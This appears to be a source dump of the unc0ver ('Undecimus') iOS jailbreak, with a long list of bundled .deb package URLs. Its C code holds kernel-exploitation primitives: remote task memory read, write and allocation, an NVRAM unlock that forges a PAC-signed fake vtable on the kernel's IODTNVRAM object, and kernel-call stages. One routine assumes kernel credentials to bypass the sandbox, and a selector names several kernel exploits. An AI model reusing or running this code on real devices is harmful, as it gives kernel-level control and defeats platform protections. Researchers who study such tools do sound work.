22 | int flags);
23 |
24 | extern kern_return_t mach_vm_deallocate(
25 | vm_map_t target,
26 | mach_vm_address_t address,
27 | mach_vm_size_t size);
28 |
29 | extern kern_return_t mach_vm_read_overwrite(
30 | vm_map_t target_task,
31 | mach_vm_address_t address,
32 | mach_vm_size_t size,
33 | mach_vm_address_t data,
34 | mach_vm_size_t* outsize);
35 |
36 | extern kern_return_t mach_vm_write(
37 | vm_map_t target_task,
38 | mach_vm_address_t address,
39 | vm_offset_t data,
40 | mach_msg_type_number_t dataCnt);
41 |
42 | uint64_t
43 | remote_alloc(mach_port_t task_port,
44 | uint64_t size)
45 | {
46 | kern_return_t err;
47 |
48 | mach_vm_offset_t remote_addr = 0;
49 | mach_vm_size_t remote_size = (mach_vm_size_t)size;
50 | err = mach_vm_allocate(task_port, &remote_addr, remote_size, 1); // ANYWHERE
51 | if (err != KERN_SUCCESS) {
52 | LOG("unable to allocate buffer in remote process");
53 | return 0;
54 | }
55 | return (uint64_t)remote_addr;
56 | }
57 |
58 | void remote_free(mach_port_t task_port,
59 | uint64_t base,
60 | uint64_t size)
61 | {
62 | kern_return_t err;
63 |
64 | err = mach_vm_deallocate(task_port, (mach_vm_address_t)base, (mach_vm_size_t)size);
65 | if (err != KERN_SUCCESS) {
66 | LOG("unabble to deallocate remote buffer");
67 | return;
68 | }
69 | return;
70 | }
71 |
72 | uint64_t
73 | alloc_and_fill_remote_buffer(mach_port_t task_port,
74 | uint64_t local_address,
75 | uint64_t length)
76 | {
77 | kern_return_t err;
78 |
79 | uint64_t remote_address = remote_alloc(task_port, length);
80 |
81 | err = mach_vm_write(task_port, remote_address, (mach_vm_offset_t)local_address, (mach_msg_type_number_t)length);
82 | if (err != KERN_SUCCESS) {
83 | LOG("unable to write to remote memory");
84 | return 0;
85 | }
86 |
87 | return remote_address;
88 | }
89 |
90 | void remote_read_overwrite(mach_port_t task_port,
91 | uint64_t remote_address,
92 | uint64_t local_address,
93 | uint64_t length)
94 | {
95 | kern_return_t err;
96 |
97 | mach_vm_size_t outsize = 0;
98 | err = mach_vm_read_overwrite(task_port, (mach_vm_address_t)remote_address, (mach_vm_size_t)length, (mach_vm_address_t)local_address, &outsize);
99 | if (err != KERN_SUCCESS) {
100 | LOG("remote read failed");
101 | return;
102 | }
103 |
104 | if (outsize != length) {
105 | LOG("remote read was short (expected %llx, got %llx", length, outsize);
106 | return;
107 | }
108 | }
109 |
110 | void remote_write(mach_port_t remote_task_port,
111 | uint64_t remote_address,
112 | uint64_t local_address,
113 | uint64_t length)
114 | {
115 | kern_return_t err = mach_vm_write(remote_task_port,
116 | (mach_vm_address_t)remote_address,
117 | (vm_offset_t)local_address,
118 | (mach_msg_type_number_t)length);
119 | if (err != KERN_SUCCESS) {
120 | LOG("remote write failed: %s %x", mach_error_string(err), err);
121 | return;
122 | }
123 | }
124 |
--------------------------------------------------------------------------------
/Undecimus/source/remote_memory.h:
--------------------------------------------------------------------------------
1 | #ifndef remote_memory_h
2 | #define remote_memory_h
3 |
4 | #include
5 | #include
6 |
7 | // allocate a buffer in the remote process
8 | uint64_t
9 | remote_alloc(mach_port_t task_port,
10 | uint64_t size);
11 |
12 | // free a buffer in the remote process
13 | void remote_free(mach_port_t task_port,
14 | uint64_t base,
15 | uint64_t size);
16 |
17 | // allocate a buffer in the remote process and fill it with the given contents
18 | uint64_t
19 | alloc_and_fill_remote_buffer(mach_port_t task_port,
20 | uint64_t local_address,
21 | uint64_t length);
22 |
23 | // read from the remote address to the local address
24 | // local address must be the address of a buffer at least length bytes in size
25 | void remote_read_overwrite(mach_port_t task_port,
26 | uint64_t remote_address,
27 | uint64_t local_address,
28 | uint64_t length);
29 |
30 | void remote_write(mach_port_t remote_task_port,
31 | uint64_t remote_address,
32 | uint64_t local_address,
33 | uint64_t length);
34 |
35 | #endif /* remote_memory_h */
36 |
--------------------------------------------------------------------------------
/Undecimus/source/unlocknvram.c:
--------------------------------------------------------------------------------
1 | // iOS 11 moves OFVariables to const
2 | // https://twitter.com/s1guza/status/908790514178301952
3 | // however, if we:
4 | // 1) Can find IODTNVRAM service
5 | // 2) Have tfp0 / kernel read|write|alloc
6 | // 3) Can leak kernel address of mach port
7 | // then we can fake vtable on IODTNVRAM object
8 |
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include "KernelUtilities.h"
14 | #include "KernelOffsets.h"
15 | #include "KernelMemory.h"
16 | #include "find_port.h"
17 | #include "pac.h"
18 | #include "kernel_call.h"
19 | #include "kc_parameters.h"
20 |
21 | static const size_t max_vtable_size = 0x1000;
22 | static const size_t kernel_buffer_size = 0x4000;
23 |
24 | // it always returns false
25 | static const uint64_t searchNVRAMProperty = 0x590;
26 | // 0 corresponds to root only
27 | static const uint64_t getOFVariablePerm = 0x558;
28 |
29 | // convertPropToObject calls getOFVariableType
30 | // open convertPropToObject, look for first vtable call -- that'd be getOFVariableType
31 | // find xrefs, figure out vtable start from that
32 | // following are offsets of entries in vtable
33 |
34 | // get kernel address of IODTNVRAM object
35 | uint64_t get_iodtnvram_obj(void) {
36 | static uint64_t IODTNVRAMObj = 0;
37 |
38 | if (IODTNVRAMObj == 0) {
39 | io_service_t IODTNVRAMSrv = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IODTNVRAM"));
40 | if (!MACH_PORT_VALID(IODTNVRAMSrv)) {
41 | LOG("Failed to get IODTNVRAM service");
42 | return 0;
43 | }
44 | uint64_t nvram_up = get_address_of_port(proc_struct_addr(), IODTNVRAMSrv);
45 | IODTNVRAMObj = ReadKernel64(nvram_up + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
46 |
47 | LOG("IODTNVRAM obj at 0x%llx", IODTNVRAMObj);
48 | }
49 |
50 | return IODTNVRAMObj;
51 | }
52 |
53 | uint64_t orig_vtable = 0;
54 | uint64_t fake_vtable = 0;
55 | uint64_t fake_vtable_xpac = 0;
56 |
57 | int unlocknvram(void) {
58 | uint64_t obj = get_iodtnvram_obj();
59 | if (obj == 0) {
60 | LOG("get_iodtnvram_obj failed!");
61 | return 1;
62 | }
63 |
64 | orig_vtable = ReadKernel64(obj);
65 | uint64_t vtable_xpac = kernel_xpacd(orig_vtable);
66 |
67 | uint64_t *buf = calloc(1, max_vtable_size);
68 | kread(vtable_xpac, buf, max_vtable_size);
69 |
70 | // alter it
71 | buf[getOFVariablePerm / sizeof(uint64_t)] = \
72 | kernel_xpaci(buf[searchNVRAMProperty / sizeof(uint64_t)]);
73 |
74 | // allocate buffer in kernel
75 | fake_vtable_xpac = IOMalloc(kernel_buffer_size);
76 |
77 | // Forge the pacia pointers to the virtual methods.
78 | size_t count = 0;
79 | for (; count < max_vtable_size / sizeof(*buf); count++) {
80 | uint64_t vmethod = buf[count];
81 | if (vmethod == 0) {
82 | break;
83 | }
84 | #if __arm64e__
85 | assert(count < VTABLE_PAC_CODES(IODTNVRAM).count);
86 | vmethod = kernel_xpaci(vmethod);
87 | uint64_t vmethod_address = fake_vtable_xpac + count * sizeof(*buf);
88 | buf[count] = kernel_forge_pacia_with_type(vmethod, vmethod_address,
89 | VTABLE_PAC_CODES(IODTNVRAM).codes[count]);
90 | #endif // __arm64e__
91 | }
92 |
93 | // and copy it back
94 | kwrite(fake_vtable_xpac, buf, count*sizeof(*buf));
95 | #if __arm64e__
96 | fake_vtable = kernel_forge_pacda(fake_vtable_xpac, 0);
97 | #else
98 | fake_vtable = fake_vtable_xpac;
99 | #endif
100 |
101 | // replace vtable on IODTNVRAM object
102 | WriteKernel64(obj, fake_vtable);
103 |
104 | SafeFreeNULL(buf);
105 | LOG("Unlocked nvram");
106 | return 0;
107 | }
108 |
109 | int locknvram(void) {
110 | if (orig_vtable == 0 || fake_vtable_xpac == 0) {
111 | LOG("Trying to lock nvram, but didnt unlock first");
112 | return -1;
113 | }
114 |
115 | uint64_t obj = get_iodtnvram_obj();
116 | if (obj == 0) { // would never happen but meh
117 | LOG("get_iodtnvram_obj failed!");
118 | return 1;
119 | }
120 |
121 | WriteKernel64(obj, orig_vtable);
122 | SafeIOFreeNULL(fake_vtable_xpac, kernel_buffer_size);
123 |
124 | LOG("Locked nvram");
125 | return 0;
126 | }
127 |
--------------------------------------------------------------------------------
/Undecimus/source/unlocknvram.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | int unlocknvram(void);
4 | int locknvram(void);
5 |
6 |
--------------------------------------------------------------------------------
/Undecimus/source/user_client.h:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_call/user_client.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__KERNEL_CALL__USER_CLIENT_H_
6 | #define VOUCHER_SWAP__KERNEL_CALL__USER_CLIENT_H_
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | /*
13 | * stage1_kernel_call_init
14 | *
15 | * Description:
16 | * Initialize stage 1 of kernel function calling.
17 | *
18 | * Initializes:
19 | * kernel_call_parameters_init()
20 | * stage1_kernel_call_7v()
21 | */
22 | bool stage1_kernel_call_init(void);
23 |
24 | /*
25 | * stage1_kernel_call_deinit
26 | *
27 | * Description:
28 | * Deinitialize stage 1 of kernel function calling.
29 | */
30 | void stage1_kernel_call_deinit(void);
31 |
32 | /*
33 | * stage1_get_kernel_buffer
34 | *
35 | * Description:
36 | * Get the address of a 0x1000-byte scratch space in kernel memory that can be used by other
37 | * stages.
38 | */
39 | uint64_t stage1_get_kernel_buffer(void);
40 |
41 | /*
42 | * stage1_kernel_call_7v
43 | *
44 | * Description:
45 | * Call a kernel function using our stage 1 execute primitive.
46 | *
47 | * Restrictions:
48 | * At most 7 arguments can be passed.
49 | * The return value is truncated to 32 bits.
50 | * At stage 1, only arguments X1 - X6 are controlled.
51 | * The function pointer must already have a PAC signature.
52 | */
53 | uint32_t stage1_kernel_call_7v(uint64_t function,
54 | size_t argument_count, const uint64_t arguments[]);
55 |
56 | /*
57 | * stage3_kernel_call_init
58 | *
59 | * Description:
60 | * Initialize stage 3 of kernel function calling.
61 | *
62 | * Initializes:
63 | * kernel_call_7v()
64 | */
65 | bool stage3_kernel_call_init(void);
66 |
67 | /*
68 | * stage3_kernel_call_deinit
69 | *
70 | * Description:
71 | * Deinitialize stage 3 of kernel function calling.
72 | */
73 | void stage3_kernel_call_deinit(void);
74 |
75 | /*
76 | * assume_kernel_credentials
77 | *
78 | * Description:
79 | * Set this process's credentials to the kernel's credentials so that we can bypass sandbox
80 | * checks.
81 | */
82 | void assume_kernel_credentials(uint64_t *ucred_field, uint64_t *ucred);
83 | /*
84 | * restore_credentials
85 | *
86 | * Description:
87 | * Restore this process's credentials after calling assume_kernel_credentials().
88 | */
89 | void restore_credentials(uint64_t ucred_field, uint64_t ucred);
90 |
91 | #endif
92 |
--------------------------------------------------------------------------------
/Undecimus/source/utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // utils.h
3 | // Undecimus
4 | //
5 | // Created by Sam Bingner on 11/23/18.
6 | // Copyright © 2018 - 2019 Sam Bingner. All rights reserved.
7 | //
8 |
9 | #ifndef _UTILS_H
10 | #define _UTILS_H
11 | #import
12 | #import
13 | #import "ArchiveFile.h"
14 |
15 | #define system(x) _system(x)
16 | extern int logfd;
17 | extern bool injectedToTrustCache;
18 | extern NSMutableArray *toInjectToTrustCache;
19 |
20 | #define DEFAULT_VERSION_STRING "Hacked"
21 | #define SLIDE_FILE "/var/tmp/slide.txt"
22 |
23 | typedef enum {
24 | async_wake_exploit = 0,
25 | voucher_swap_exploit,
26 | mach_swap_exploit,
27 | mach_swap_2_exploit,
28 | deja_xnu_exploit,
29 | necp_exploit,
30 | kalloc_crash
31 | } exploit_t;
32 |
33 | enum hashtype {
34 | HASHTYPE_MD5 = 0,
35 | HASHTYPE_SHA1
36 | };
37 | int proc_pidpath(pid_t pid, void *buffer, uint32_t buffersize);
38 |
39 | @interface LSApplicationWorkspace : NSObject
40 | + (id) defaultWorkspace;
41 | - (BOOL) registerApplication:(id)application;
42 | - (BOOL) unregisterApplication:(id)application;
43 | - (BOOL) invalidateIconCache:(id)bundle;
44 | - (BOOL) registerApplicationDictionary:(id)application;
45 | - (BOOL) installApplication:(id)application withOptions:(id)options;
46 | - (BOOL) _LSPrivateRebuildApplicationDatabasesForSystemApps:(BOOL)system internal:(BOOL)internal user:(BOOL)user;
47 | - (BOOL) applicationIsInstalled:(id)arg1;
48 | @end
49 |
50 | static inline bool create_file_data(const char *file, int owner, mode_t mode, NSData *data) {
51 | return [[NSFileManager defaultManager] createFileAtPath:@(file) contents:data attributes:@{
52 | NSFileOwnerAccountID: @(owner),
53 | NSFileGroupOwnerAccountID: @(owner),
54 | NSFilePosixPermissions: @(mode)
55 | }
56 | ];
57 | }
58 |
59 | static inline bool create_file(const char *file, int owner, mode_t mode) {
60 | return create_file_data(file, owner, mode, nil);
61 | }
62 |
63 | static inline bool clean_file(const char *file) {
64 | NSString *path = @(file);
65 | if ([[NSFileManager defaultManager] attributesOfItemAtPath:path error:nil]) {
66 | return [[NSFileManager defaultManager] removeItemAtPath:path error:nil];
67 | }
68 | return YES;
69 | }
70 |
71 | static inline bool init_file(const char *file, int owner, mode_t mode) {
72 | NSString *path = @(file);
73 | return ([[NSFileManager defaultManager] fileExistsAtPath:path] &&
74 | [[NSFileManager defaultManager] setAttributes:@{
75 | NSFileOwnerAccountID: @(owner),
76 | NSFileGroupOwnerAccountID: @(owner),
77 | NSFilePosixPermissions: @(mode)
78 | } ofItemAtPath:path error:nil]);
79 | }
80 |
81 | int sha1_to_str(const unsigned char *hash, size_t hashlen, char *buf, size_t buflen);
82 | NSString *sha1sum(NSString *file);
83 | bool verifySha1Sums(NSString *sumFile);
84 | bool verifySums(NSString *sumFile, enum hashtype hash);
85 | int _system(const char *cmd);
86 | int systemf(const char *cmd, ...);
87 | bool pkgIsInstalled(char *packageID);
88 | bool pkgIsConfigured(char *packageID);
89 | bool pkgIsBy(const char *maintainer, const char *packageID);
90 | bool compareInstalledVersion(const char *packageID, const char *op, const char *version);
91 | bool extractDeb(NSString *debPath, bool doInject);
92 | bool extractDebs(NSArray *debPaths, bool doInject);
93 | bool installDeb(const char *debName, bool forceDeps);
94 | bool installDebs(NSArray *debs, bool forceDeps, bool forceAll);
95 | bool removePkg(char *packageID, bool forceDeps);
96 | bool removePkgs(NSArray *packageIDs, bool forceDeps);
97 | BOOL compareDpkgVersion(NSString *version1, NSString *op, NSString *version2, BOOL *result);
98 | NSString *debForPkg(NSString *pkg);
99 | bool aptUpdate(void);
100 | bool aptInstall(NSArray *pkgs);
101 | bool aptUpgrade(void);
102 | bool aptRepair(void);
103 | bool runApt(NSArray *args);
104 | bool extractAptPkgList(NSString *path, ArchiveFile* listcache, id_t owner);
105 | bool ensureAptPkgLists(void);
106 | bool is_symlink(const char *filename);
107 | bool is_directory(const char *filename);
108 | bool is_mountpoint(const char *filename);
109 | bool ensure_directory(const char *directory, int owner, mode_t mode);
110 | bool ensure_file(const char *file, int owner, mode_t mode);
111 | bool ensure_symlink(const char *to, const char *from);
112 | bool mode_is(const char *filename, mode_t mode);
113 | int runCommandv(const char *cmd, int argc, const char * const* argv, void (^unrestrict)(pid_t));
114 | int runCommand(const char *cmd, ...);
115 | NSString *pathForResource(NSString *resource);
116 | pid_t pidOfProcess(const char *name);
117 | char *getKernelVersion(void);
118 | char *getMachineName(void);
119 | char *getModelName(void);
120 | bool kernelVersionContains(const char *string);
121 | bool machineNameContains(const char *string);
122 | bool jailbreakEnabled(void);
123 | NSString *getKernelBuildVersion(void);
124 | bool supportsExploit(exploit_t exploit);
125 | bool jailbreakSupported(void);
126 | bool respringSupported(void);
127 | bool restartSupported(void);
128 | NSInteger recommendedJailbreakSupport(void);
129 | NSInteger recommendedRestartSupport(void);
130 | NSInteger recommendedRespringSupport(void);
131 | bool daemonIsLoaded(char *daemonID);
132 | NSString *bundledResourcesVersion(void);
133 | NSString *appVersion(void);
134 | bool debuggerEnabled(void);
135 | NSString *getLogFile(void);
136 | void enableLogging(void);
137 | void disableLogging(void);
138 | void cleanLogs(void);
139 | bool modifyPlist(NSString *filename, void (^function)(id));
140 | void list(NSString *directory);
141 | bool canRead(const char *file);
142 | bool restartSpringBoard(void);
143 | bool uninstallRootLessJB(void);
144 | bool verifyECID(NSString *ecid);
145 | bool canOpen(const char *URL);
146 | bool airplaneModeEnabled(void);
147 | bool installApp(const char *bundle);
148 | bool rebuildApplicationDatabases(void);
149 | char *get_path_for_pid(pid_t pid);
150 | NSString *getECID(void);
151 | NSString *getUDID(void);
152 | char *sysctlWithName(const char *name);
153 | char *getOSVersion(void);
154 | char *getOSProductVersion(void);
155 | void printOSDetails(void);
156 | bool isBetaFirmware(void);
157 | double getUptime(void);
158 | vm_size_t get_kernel_page_size(void);
159 | int waitForFile(const char *filename);
160 | NSString *hexFromInt(NSInteger val);
161 | void waitFor(int seconds);
162 | bool blockDomainWithName(const char *name);
163 | bool unblockDomainWithName(const char *name);
164 | bool cydiaIsInstalled(void);
165 | bool sileoIsInstalled(void);
166 |
167 | extern NSData *lastSystemOutput;
168 |
169 | #endif /* _UTILS_H */
170 |
--------------------------------------------------------------------------------
/Undecimus/source/voucher_swap-poc.h:
--------------------------------------------------------------------------------
1 | //
2 | // voucher_swap-poc.h
3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 2/4/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #ifndef voucher_swap_poc_h
10 | #define voucher_swap_poc_h
11 |
12 | int voucher_swap_poc(void);
13 |
14 | #endif /* voucher_swap_poc_h */
15 |
--------------------------------------------------------------------------------
/Undecimus/source/voucher_swap.h:
--------------------------------------------------------------------------------
1 | /*
2 | * voucher_swap.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__VOUCHER_SWAP_H_
6 | #define VOUCHER_SWAP__VOUCHER_SWAP_H_
7 |
8 | /*
9 | * voucher_swap
10 | *
11 | * Description:
12 | * Run the voucher_swap exploit.
13 | */
14 | void voucher_swap(void);
15 |
16 | #endif
17 |
--------------------------------------------------------------------------------
/Update.txt:
--------------------------------------------------------------------------------
1 | 1.2.3
2 |
--------------------------------------------------------------------------------
/apt/Release:
--------------------------------------------------------------------------------
1 | Origin: Undecimus
2 | Label: Undecimus
3 | Suite: stable
4 | Version: 0.1
5 | Codename: Undecimus
6 | Architectures: iphoneos-arm
7 | Components: main
8 | Description: Unc0ver Bundled
9 |
--------------------------------------------------------------------------------
/apt/apt-key_1.8.0_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/apt-key_1.8.0_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/apt-lib_1.8.0-sileo3_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/apt-lib_1.8.0-sileo3_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/apt_1.8.0_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/apt_1.8.0_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/base_1-5_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/base_1-5_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/bash_5.0.3-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/bash_5.0.3-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/berkeleydb_6.2.32-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/berkeleydb_6.2.32-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/bzip2_1.0.6-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/bzip2_1.0.6-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/ca-certificates_0.0.2_all.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/ca-certificates_0.0.2_all.deb
--------------------------------------------------------------------------------
/apt/com.parrotgeek.nobetaalert_1.3.1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/com.parrotgeek.nobetaalert_1.3.1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/com.ps.letmeblock_0.0.1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/com.ps.letmeblock_0.0.1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/com.saurik.substrate.safemode_0.9.6001.1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/com.saurik.substrate.safemode_0.9.6001.1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/coreutils-bin_8.30-3_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/coreutils-bin_8.30-3_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/coreutils_8.30-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/coreutils_8.30-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/cydia-dark_1.9.3~b5_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/cydia-dark_1.9.3~b5_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/cydia-lproj_1.9.3~b1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/cydia-lproj_1.9.3~b1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/cydia_2.0_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/cydia_2.0_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/darwintools_1-6_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/darwintools_1-6_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/debianutils_4.8.6-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/debianutils_4.8.6-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/diffutils_3.6-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/diffutils_3.6-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/diskdev-cmds_593.221.1-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/diskdev-cmds_593.221.1-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/dpkg_1.19.2-11dark_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/dpkg_1.19.2-11dark_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/essential_0-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/essential_0-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/file_5.35-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/file_5.35-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/findutils_4.6.0-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/findutils_4.6.0-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/firmware-sbin_0-1_all.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/firmware-sbin_0-1_all.deb
--------------------------------------------------------------------------------
/apt/gcrypt_1.8.3-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/gcrypt_1.8.3-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/gettext_0.19.8-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/gettext_0.19.8-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/gnupg_2.2.11-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/gnupg_2.2.11-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/gnutls_3.5.19-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/gnutls_3.5.19-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/grep_3.1-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/grep_3.1-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/gzip_1.9-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/gzip_1.9-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/jailbreak-resources_1.0~b23_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/jailbreak-resources_1.0~b23_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/ldid_2-2.1.1+elucubratus2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/ldid_2-2.1.1+elucubratus2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libassuan_2.5.1-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libassuan_2.5.1-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libgmp10_6.1.2-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libgmp10_6.1.2-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libgpg-error_1.32-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libgpg-error_1.32-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libidn2_6.1.2-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libidn2_6.1.2-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libksba_1.3.5-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libksba_1.3.5-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libplist_2.0.0-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libplist_2.0.0-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libssl1.0_1.0.2r-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libssl1.0_1.0.2r-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
